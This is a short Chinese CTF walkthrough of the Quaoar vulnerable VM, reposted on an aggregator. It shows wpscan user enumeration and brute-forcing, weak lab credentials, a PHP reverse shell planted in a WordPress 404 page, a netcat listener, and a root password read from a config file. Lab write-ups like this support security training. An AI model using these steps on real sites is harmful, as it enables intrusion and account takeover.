Quaoar - 走看看

zoukankan html css js c++ java

Quaoar

靶机环境VirtualBox，桥接模式

主机发现

端口扫描

查看robots文件

用户名枚举

root@kali:/# wpscan --url http://192.168.0.122/wordpress --enumerate u

暴力破解

wpscan --url [wordpress网址] -P [字典文件] -U [要破解的用户]

Username: admin, Password: admin

kali自带的Webshell地址，里面有不同语言的Webshell

/usr/share/webshells

这里用的是php-reverse-shell.php

也可以在github上搜索

https://github.com/search?q=php-reverse-shell.php

404页面插入反弹shell,访问404页面触发反弹shell

root@kali:~# nc -lvvp 1234

查看内核信息

www-data@Quaoar:/home/wpadmin$ cat /proc/version

读取配置文件

root用户密码：rootpassword!

另一个flag

查看全文

相关阅读:
ksframework的xlua版本
 unity摄像机脚本
 代码重构：用工厂+策略模式优化过多的if else代码块
 在Unity中创建攻击Slot系统
 Unity运用GPU代替CPU处理和计算简单测试
 程序员工具集
 Unity开发-你必须知道的优化建议
 unity向量计算
 ClassFoo-IT知识花园
 BZOJ 3446: [Usaco2014 Feb]Cow Decathlon( 状压dp )

原文地址：https://www.cnblogs.com/JKding233/p/12637576.html

Copyright © 2011-2022 走看看